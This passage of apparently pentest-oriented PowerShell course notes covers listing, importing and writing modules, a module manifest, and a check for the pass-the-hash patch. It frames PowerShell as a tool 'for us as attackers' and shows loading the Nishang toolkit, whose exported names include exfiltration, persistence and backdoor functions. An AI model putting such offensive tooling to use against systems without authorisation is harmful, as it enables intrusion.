1.0.0.0 NetIPsecIdentity.cmdletDefinition Cim 1.0.0.0 NetIPsecMainModeCryptoSet.cmdlet... {Get-NetIPsecMainModeCryptoSet, Set-NetIPsecMainModeCryptoSet, Remove-NetIPsecMainModeCryptoSet, Rename-NetIPsecMainModeCryptoSet...} Cim 1.0.0.0 NetIPsecMainModeRule.cmdletDefin... {Get-NetIPsecMainModeRule, Set-NetIPsecMainModeRule, Remove-NetIPsecMainModeRule, Rename-NetIPsecMainModeRule...} Cim 1.0.0.0 NetIPsecMainModeSA.cmdletDefinition {Get-NetIPsecMainModeSA, Remove-NetIPsecMainModeSA} Cim 1.0.0.0 NetIPsecPhase1AuthSet.cmdletDefi... {Get-NetIPsecPhase1AuthSet, Set-NetIPsecPhase1AuthSet, Remove-NetIPsecPhase1AuthSet, Rename-NetIPsecPhase1AuthSet...} Cim 1.0.0.0 NetIPsecPhase2AuthSet.cmdletDefi... {Get-NetIPsecPhase2AuthSet, Set-NetIPsecPhase2AuthSet, Remove-NetIPsecPhase2AuthSet, Rename-NetIPsecPhase2AuthSet...} Cim 1.0.0.0 NetIPsecPolicyChange.cmdletDefin... Cim 1.0.0.0 NetIPsecQuickModeCryptoSet.cmdle... {Get-NetIPsecQuickModeCryptoSet, Set-NetIPsecQuickModeCryptoSet, Remove-NetIPsecQuickModeCryptoSet, Rename-NetIPsecQuickModeCryptoSet...} Cim 1.0.0.0 NetIPsecQuickModeSA.cmdletDefini... {Get-NetIPsecQuickModeSA, Remove-NetIPsecQuickModeSA} Cim 1.0.0.0 NetIPsecRule.cmdletDefinition {Get-NetIPsecRule, Set-NetIPsecRule, Remove-NetIPsecRule, Rename-NetIPsecRule...} Manifest 2.0.0.0 NetLbfo {Add-NetLbfoTeamMember, Add-NetLbfoTeamNic, Get-NetLbfoTeam, Get-NetLbfoTeamMember...} Manifest 1.0.0.0 NetNat {Get-NetNat, Get-NetNatExternalAddress, Get-NetNatStaticMapping, Get-NetNatSession...} Manifest 2.0.0.0 NetQos {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy} Manifest 2.0.0.0 NetSecurity {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...} Manifest 1.0.0.0 NetSwitchTeam {New-NetSwitchTeam, Remove-NetSwitchTeam, Get-NetSwitchTeam, Rename-NetSwitchTeam...} Manifest 1.0.0.0 NetTCPIP {Get-NetIPAddress, Get-NetIPInterface, Get-NetIPv4Protocol, Get-NetIPv6Protocol...} Manifest 1.0.0.0 NetworkConnectivityStatus {Get-DAConnectionStatus, Get-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration} Script 0.0 NetworkSwitchConfiguration {Restore-NetworkSwitchConfiguration, Save-NetworkSwitchConfiguration, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace...} Script 0.0 NetworkSwitchEthernetPort {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres... Script 0.0 NetworkSwitchFeature {Disable-NetworkSwitchFeature, Enable-NetworkSwitchFeature, Get-NetworkSwitchFeature, CmdletShouldProcess...} Script 0.0 NetworkSwitchGlobalSettingData {Get-NetworkSwitchGlobalData, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace...} Manifest 1.0.0.0 NetworkSwitchManager {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres... Script 0.0 NetworkSwitchVlan {Disable-NetworkSwitchVlan, Enable-NetworkSwitchVlan, Get-NetworkSwitchVlan, New-NetworkSwitchVlan...} Manifest 1.0.0.0 NetworkTransition {Add-NetIPHttpsCertBinding, Disable-NetDnsTransitionConfiguration, Disable-NetIPHttpsProfile, Disable-NetNatTransitionConfiguration...} Cim 1.0.0.0 OffloadDataTransferSetting Get-OffloadDataTransferSetting Cim 1.0.0.0 Partition {Get-Partition, Remove-Partition, Resize-Partition, Get-PartitionSupportedSize...} Manifest 1.0.0.0 PcsvDevice {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...} Cim 1.0.0.0 PhysicalDisk {Get-PhysicalDisk, Enable-PhysicalDiskIdentification, Disable-PhysicalDiskIdentification, Reset-PhysicalDisk...} Manifest 1.0.0.0 pki {Add-CertificateEnrollmentPolicyServer, Export-Certificate, Export-PfxCertificate, Get-CertificateAutoEnrollmentPolicy...} Cim 1.0 PnpDevice {Get-PnpDevice, Enable-PnpDevice, Disable-PnpDevice, Get-PnpDeviceProperty} Manifest 1.0.0.0 PnpDevice {Get-PnpDevice, Get-PnpDeviceProperty, Enable-PnpDevice, Disable-PnpDevice} Manifest 0.0 PnpDevice.Resource Manifest 1.1 PrintManagement {Add-Printer, Add-PrinterDriver, Add-PrinterPort, Get-PrintConfiguration...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 PS_BackgroundTask {Get-AppBackgroundTask, Start-AppBackgroundTask, Unregister-AppBackgroundTask} Cim 1.0 PS_ClusteredScheduledTask_v1.0 {Get-ClusteredScheduledTask, Register-ClusteredScheduledTask, Set-ClusteredScheduledTask, Unregister-ClusteredScheduledTask} Cim 1.0.0 PS_DnsClientNRPTGlobal_v1.0.0 {Get-DnsClientNrptGlobal, Set-DnsClientNrptGlobal} Cim 1.0.0 PS_DnsClientNrptPolicy_v1.0.0 Get-DnsClientNrptPolicy Cim 1.0.0 PS_DnsClientNRPTRule_v1.0.0 {Add-DnsClientNrptRule, Get-DnsClientNrptRule, Remove-DnsClientNrptRule, Set-DnsClientNrptRule} Cim 1.0.0 PS_EapConfiguration_v1.0.0 New-EapConfiguration Cim 1.0 ps_mmagent_v1.0 {Debug-MMAppPrelaunch, Disable-MMAgent, Enable-MMAgent, Get-MMAgent...} Cim 1.0 PS_ScheduledTask_v1.0 {Disable-ScheduledTask, Enable-ScheduledTask, Export-ScheduledTask, Get-ScheduledTaskInfo...} Cim 1.0.0 PS_VpnConnection_v1.0.0 {Add-VpnConnection, Get-VpnConnection, Remove-VpnConnection, Set-VpnConnection} Cim 1.0 PS_VpnConnectionIPsecConfigurati... Set-VpnConnectionIPsecConfiguration Cim 1.0 PS_VpnConnectionProxy_v1.0 Set-VpnConnectionProxy Cim 1.0 PS_VpnConnectionRoute_v1.0 {Add-VpnConnectionRoute, Remove-VpnConnectionRoute} Cim 1.0 PS_VpnConnectionTrigger_v1.0 Get-VpnConnectionTrigger Cim 1.0 PS_VpnConnectionTriggerApplicati... {Add-VpnConnectionTriggerApplication, Remove-VpnConnectionTriggerApplication} Cim 1.0 PS_VpnConnectionTriggerDnsConfig... {Add-VpnConnectionTriggerDnsConfiguration, Remove-VpnConnectionTriggerDnsConfiguration, Set-VpnConnectionTriggerDnsConfiguration} Cim 1.0 PS_VpnConnectionTriggerTrustedNe... {Add-VpnConnectionTriggerTrustedNetwork, Remove-VpnConnectionTriggerTrustedNetwork, Set-VpnConnectionTriggerTrustedNetwork} Cim 1.0 PS_VpnServerAddress_v1.0 New-VpnServerAddress Manifest 1.1 PSDesiredStateConfiguration {Set-DscLocalConfigurationManager, Start-DscConfiguration, Test-DscConfiguration, Publish-DscConfiguration...} Script 0.0 PSDesiredStateConfiguration {Generate-VersionInfo, Set-PSMetaConfigDocInsProcessedBeforeMeta, Get-PSMetaConfigurationProcessed, Get-PSMetaConfigDocumentInstVersionInfo...} Script 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...} Script 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...} Script 0.0 PSDscXMachine {Get-_InternalPSDscXMachineTR, Set-_InternalPSDscXMachineTR, Test-_InternalPSDscXMachineTR} Binary 1.1.0.0 PSScheduledJob {New-JobTrigger, Add-JobTrigger, Remove-JobTrigger, Get-JobTrigger...} Manifest 2.0.0.0 PSWorkflow {New-PSWorkflowExecutionOption, New-PSWorkflowSession, nwsn} Script 0.0 PSWorkflow {New-PSWorkflowSession, nwsn} Manifest 1.0.0.0 PSWorkflowUtility Invoke-AsWorkflow Script 0.0 PSWorkflowUtility Invoke-AsWorkflow Cim 2.0.0.0 Remove-DscConfigurationDocument Remove-DscConfigurationDocument Cim 1.0.0.0 ResiliencySetting {Get-ResiliencySetting, Set-ResiliencySetting} Cim 2.0.0.0 Restore-DscConfiguration Restore-DscConfiguration Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 RunAsHelper {Get-DomainAndUserName, Import-DscNativeMethods, IsNanoServer} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0.0.0 ScheduledTasks {Get-ScheduledTask, Set-ScheduledTask, Register-ScheduledTask, Unregister-ScheduledTask...} Manifest 2.0.0.0 SecureBoot {Confirm-SecureBootUEFI, Set-SecureBootUEFI, Get-SecureBootUEFI, Format-SecureBootUEFI...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 SmbBandwidthLimit {Get-SmbBandwidthLimit, Remove-SmbBandwidthLimit, Set-SmbBandwidthLimit, gsmbb...} Cim 1.0 SmbClientConfiguration {Get-SmbClientConfiguration, Set-SmbClientConfiguration, gsmbcc, ssmbcc} Cim 1.0 SmbClientNetworkInterface {Get-SmbClientNetworkInterface, gsmbcn} Cim 1.0 SmbConnection {Get-SmbConnection, gsmbc} Cim 1.0 SmbMapping {Get-SmbMapping, Remove-SmbMapping, New-SmbMapping, gsmbm...} Cim 1.0 SmbMultichannelConnection {Get-SmbMultichannelConnection, Update-SmbMultichannelConnection, gsmbmc, udsmbmc} Cim 1.0 SmbMultichannelConstraint {Get-SmbMultichannelConstraint, Remove-SmbMultichannelConstraint, New-SmbMultichannelConstraint, gsmbt...} Cim 1.0 SmbOpenFile {Get-SmbOpenFile, Close-SmbOpenFile, gsmbo, cssmbo} Script 0.0 SmbScriptModule {Set-SmbPathAcl, Get-SmbDelegation, Enable-SmbDelegation, Disable-SmbDelegation...} Cim 1.0 SmbServerConfiguration {Get-SmbServerConfiguration, Set-SmbServerConfiguration, gsmbsc, ssmbsc} Cim 1.0 SmbServerNetworkInterface {Get-SmbServerNetworkInterface, gsmbsn} Cim 1.0 SmbSession {Get-SmbSession, Close-SmbSession, gsmbse, cssmbse} Cim 1.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...} Manifest 2.0.0.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...} Script 0.0 SmbShare.Format.Helper Format-LinkSpeed Manifest 2.0.0.0 SmbWitness {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...} Cim 1.0 SmbWitnessWmiClient {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...} Manifest 1.0.0.0 StartLayout {Export-StartLayout, Import-StartLayout, Get-StartApps} Cim 2.0.0.0 Stop-DscConfiguration Stop-DscConfiguration Manifest 2.0.0.0 Storage {Add-InitiatorIdToMaskingSet, Add-PartitionAccessPath, Add-PhysicalDisk, Add-TargetPortToMaskingSet...} Cim 1.0.0.0 StorageCmdlets {Set-Disk, Set-Volume, Set-Partition, Set-PhysicalDisk...} Cim 1.0.0.0 StorageEnclosure {Get-StorageEnclosure, Enable-StorageEnclosureIdentification, Disable-StorageEnclosureIdentification, Get-StorageEnclosureVendorData} Cim 1.0.0.0 StorageHealth {Get-StorageHealth, Get-StorageHealthSettingInternal, Set-StorageHealthSettingInternal, Remove-StorageHealthSettingInternal} Cim 1.0.0.0 StorageJob {Get-StorageJob, Stop-StorageJob} Cim 1.0.0.0 StorageNode Get-StorageNode Cim 1.0.0.0 StoragePool {Get-StoragePool, New-VirtualDisk, New-StorageTier, Remove-StoragePool...} Cim 1.0.0.0 StorageProvider {Get-StorageProvider, Update-StorageProviderCache, Register-StorageSubsystem, Unregister-StorageSubsystem...} Cim 1.0.0.0 StorageReliabilityCounter {Get-StorageReliabilityCounterDeprecated, Reset-StorageReliabilityCounter} Script 0.0 StorageScripts {CreateErrorRecord, Get-PhysicalDiskStorageNodeView, Get-DiskStorageNodeView, Get-StorageEnclosureStorageNodeView...} Cim 1.0.0.0 StorageSetting {Get-StorageSetting, Set-StorageSetting, Update-HostStorageCache} Cim 1.0.0.0 StorageSubSystem {Get-StorageSubSystem, New-StoragePool, New-StorageSubsystemVirtualDisk, New-MaskingSet...} Cim 1.0.0.0 StorageTier {Get-StorageTier, Remove-StorageTier, Resize-StorageTier, Get-StorageTierSupportedSize} Cim 1.0.0.0 TargetPort Get-TargetPort Cim 1.0.0.0 TargetPortal Get-TargetPortal Script 0.0 TestDtc {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...} Script 0.0 Test-NetConnection {Test-NetConnection, TNC} Manifest 2.0.0.0 tls {New-TlsSessionTicketKey, Enable-TlsSessionTicketKey, Disable-TlsSessionTicketKey, Export-TlsSessionTicketKey...} Manifest 1.0.0.0 TroubleshootingPack {Get-TroubleshootingPack, Invoke-TroubleshootingPack} Manifest 2.0.0.0 TrustedPlatformModule {Get-Tpm, Initialize-Tpm, Clear-Tpm, Unblock-Tpm...} Binary 2.1.639.0 UEV {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...} Cim 1.0.0.0 VirtualDisk {Get-VirtualDisk, Remove-VirtualDisk, Show-VirtualDisk, Hide-VirtualDisk...} Cim 1.0.0.0 Volume {Get-Volume, Format-Volume, Repair-Volume, Optimize-Volume...} Manifest 2.0.0.0 VpnClient {Add-VpnConnection, Set-VpnConnection, Remove-VpnConnection, Get-VpnConnection...} Manifest 1.0.0.0 Wdac {Get-OdbcDriver, Set-OdbcDriver, Get-OdbcDsn, Add-OdbcDsn...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Binary 1.0 WebDownloadManager {Get-DscDocument, Get-DscModule, Get-DscAction, Send-DscStatus...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0.0.0 WindowsDeveloperLicense {Get-WindowsDeveloperLicense, Unregister-WindowsDeveloperLicense, Show-WindowsDeveloperLicenseRegistration} Script 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting} Script 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 WindowsPackageCab Script 1.0 WindowsPackageCab Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0.0.0 WindowsSearch {Get-WindowsSearchSetting, Set-WindowsSearchSetting} Manifest 1.0.0.0 WindowsUpdate Get-WindowsUpdateLog Script 0.0 WindowsUpdateLog Get-WindowsUpdateLog PS C:\Users\Windows10-32> ``` - Loading/Importing Modules ```PowerShell PS C:\Users\Windows10-32> Import-Module ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} Script 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...} PS C:\Users\Administrator\Desktop\nishang-master> ``` - PSModulePath ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> $env:PSModulePath C:\Users\Administrator\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ PS C:\Users\Administrator\Desktop\nishang-master> ``` - Unloading/Removing Modules ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} Script 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...} PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Remove-Module nishang ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} PS C:\Users\Administrator\Desktop\nishang-master> ``` - [Different types of Modules](https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx) - Script Modules - Binary Modules - Manifest Modules - Dynamic Modules ================================================ FILE: 18-Modules-in-Powershell-Part-2.md ================================================ #### 18. Modules in Powershell Part 2 ###### Writing Modules ```Show-AdvancedScript.psm1``` ```PowerShell function Show-AdvancedScript { [CmdletBinding( SupportsShouldProcess = $True)] param( [Parameter()] $Global:FilePath ) Write-Verbose "Deleting $FilePath" if ($PSCmdlet.ShouldProcess("$FilePath", "Deleting file permanently")) { Remove-Item $FilePath } } function Test-FileExistence { Test-Path $FilePath } function DoNoNeedToShow { Write-Output "No Need to show this to user" } Export-ModuleMember -Function *-* ``` - ```Import``` the module ```PowerShell PS C:\Users\Windows10-32> cd .\Desktop PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1 PS C:\Users\Windows10-32\Desktop> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} Script 0.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence} PS C:\Users\Windows10-32\Desktop> ``` ```PowerShell PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1 -Verbose VERBOSE: Loading module from path 'C:\Users\Windows10-32\Desktop\Show-AdvancedScript.psm1'. VERBOSE: Importing function 'Show-AdvancedScript'. VERBOSE: Importing function 'Test-FileExistence'. PS C:\Users\Windows10-32\Desktop> ``` - List the ```functions``` of a module ```PowerShell PS C:\Users\Windows10-32\Desktop> Get-Command -Module Show-AdvancedScript CommandType Name Version Source ----------- ---- ------- ------ Function Show-AdvancedScript 0.0 Show-AdvancedScript Function Test-FileExistence 0.0 Show-AdvancedScript PS C:\Users\Windows10-32\Desktop> ``` - Run the ```functions``` of the ```module``` ```PowerShell PS C:\Users\Administrator\Desktop\Code\18> Show-AdvancedScript C:\Users\Administrator\Desktop\1.txt PS C:\Users\Administrator\Desktop\Code\18> Test-FileExistence C:\Users\Administrator\Desktop\1.txt False PS C:\Users\Administrator\Desktop\Code\18> ``` - ```Remove``` module ```PowerShell PS C:\Users\Windows10-32\Desktop> Remove-Module Show-AdvancedScript ``` ```PowerShell PS C:\Users\Windows10-32\Desktop> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} PS C:\Users\Windows10-32\Desktop> ``` - Controlling ```visibility``` ```PowerShell PS C:\Users\Windows10-32\Desktop> Remove-Module Show-AdvancedScript ``` ```PowerShell PS C:\Users\Windows10-32\Desktop> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet} Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} PS C:\Users\Windows10-32\Desktop> ``` ```PowerShell PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1 -Verbose VERBOSE: Importing function 'Show-AdvancedScript'. VERBOSE: Importing function 'Test-FileExistence'. PS C:\Users\Windows10-32\Desktop> ``` ###### Exercise Write a module which checks for the presence of KB2871997 (the Pass the hash fix). The module must have at least two functions: - One which does the actual stuff which should not be exported. - Another for displaying the results to the user with a warning if the patch is not present. ```Check-PassTheHash.psm1``` ```PowerShell function Check-PassTheHash { $hotfixes = "KB2871997" #checks the computer it's run on if any of the listed hotfixes are present $hotfix = Get-HotFix -ComputerName $env:computername | Where-Object {$hotfixes -contains $_.HotfixID} | Select-Object -property "HotFixID" $Global:out = Get-HotFix | Where-Object {$hotfixes -contains $_.HotfixID} } function Result-PassTheHash { if ($out) { "Found HotFix: " + $out.HotFixID } else { "Didn't Find HotFix" } } ``` ```PowerShell PS C:\Users\Administrator\Desktop> Import-Module .\Check-PassTheHash.psm1 WARNING: The names of some imported commands from the module 'Check-PassTheHash' include unapproved verbs that might make them less discoverab le. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Command -Module Check-PassTheHash CommandType Name ModuleName ----------- ---- ---------- Function Check-PassTheHash Check-PassTheHash Function Result-PassTheHash Check-PassTheHash PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Check-PassTheHash ``` ```PowerShell PS C:\Users\Administrator\Desktop> Result-PassTheHash Didn't Find HotFix PS C:\Users\Administrator\Desktop> ``` ================================================ FILE: 19-Modules-in-Powershell-Part-3.md ================================================ #### 19. Modules in Powershell Part 3 ###### Manifest Modules ```Show-AdvancedScript.psd1``` ```PowerShell # # Module manifest for module 'Show-AdvancedScript' # # Generated by: Administrator # # Generated on: 7/11/2017 # @{ # Script module or binary module file associated with this manifest. RootModule = 'Show-AdvancedScript.psm1' # Version number of this module. ModuleVersion = '1.0' # ID used to uniquely identify this module GUID = '57ee3f4b-356b-4417-90ab-134b533f845e' # Author of this module Author = 'Administrator' # Company or vendor of this module CompanyName = 'Unknown' # Copyright statement for this module Copyright = '(c) 2017 Administrator. All rights reserved.' # Description of the functionality provided by this module # Description = '' # Minimum version of the Windows PowerShell engine required by this module # PowerShellVersion = '' # Name of the Windows PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the Windows PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module # CLRVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module # RequiredModules = @() # Assemblies that must be loaded prior to importing this module # RequiredAssemblies = @() # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module FunctionsToExport = '*_*' # Cmdlets to export from this module CmdletsToExport = '*' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module AliasesToExport = '*' # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' } ``` - Creating a ```Manifest``` ```PowerShell PS C:\Users\Administrator\Desktop\19> ls Directory: C:\Users\Administrator\Desktop\19 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1 PS C:\Users\Administrator\Desktop\19> ``` ```PowerShell PS C:\Users\Administrator\Desktop\19> New-ModuleManifest .\Show-AdvancedScript.psd1 ``` ```PowerShell PS C:\Users\Administrator\Desktop\19> ls Directory: C:\Users\Administrator\Desktop\19 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 7/11/2017 12:07 PM 5246 Show-AdvancedScript.psd1 -a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1 PS C:\Users\Administrator\Desktop\19> ``` - Testing the ```Manifest Module``` ```PowerShell PS C:\Users\Administrator\Desktop\19> Test-ModuleManifest .\Show-AdvancedScript.psd1 ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence} PS C:\Users\Administrator\Desktop\19> ``` - Using the manifest - Importing the ```module``` ```PowerShell PS C:\Users\Administrator\Desktop\19> Import-Module .\Show-AdvancedScript.psd1 -Verbose VERBOSE: Loading module from path 'C:\Users\Administrator\Desktop\19\Show-AdvancedScript.psd1'. VERBOSE: Importing function 'Show-AdvancedScript'. VERBOSE: Importing function 'Test-FileExistence'. PS C:\Users\Administrator\Desktop\19> ``` - Importing the ```module``` with the ```Version``` ```PowerShell PS C:\Users\Administrator\Desktop\19> Import-Module .\Show-AdvancedScript.psd1 -Version 1.0 ``` ================================================ FILE: 2-Introduction-to-Powershell.md ================================================ #### 2. Introduction to Powershell ###### [PowerShell](https://technet.microsoft.com/en-us/library/bb978526.aspx) - Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration. - Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows - A powerful shell and scripting language already present on the most general targets in a pen test – Windows computers. - Less dependence on Metasploit and *nix based scripting. - Stick to PowerShell v2 as this is the version available on most of the targets (default on Windows 7 and Server 2008 R2) - Provides access to almost everything on a Windows platform which could be useful for us as attackers. - Easy to learn and really powerful. - Based on .Net framework and is tightly integrated with Windows. - Trusted by the countermeasures and system administrators. - Get ```powershell version``` ```Powershell PS C:\Users\Windows-32> Get-Host Name : ConsoleHost Version : 2.0 InstanceId : 648eccf6-c720-415f-af58-3a94b395097a UI : System.Management.Automation.Internal.Host.InternalHostUserInterface CurrentCulture : en-US CurrentUICulture : en-US PrivateData : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy IsRunspacePushed : False Runspace : System.Management.Automation.Runspaces.LocalRunspace PS C:\Users\Windows-32> ``` - ```Directory Listing``` ```Powershell PS C:\> dir Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 7/13/2009 7:37 PM PerfLogs d-r-- 5/28/2017 2:21 PM Program Files d-r-- 5/28/2017 11:33 AM Users d---- 5/28/2017 2:21 PM Windows -a--- 6/10/2009 2:42 PM 24 autoexec.bat -a--- 6/10/2009 2:42 PM 10 config.sys PS C:\> 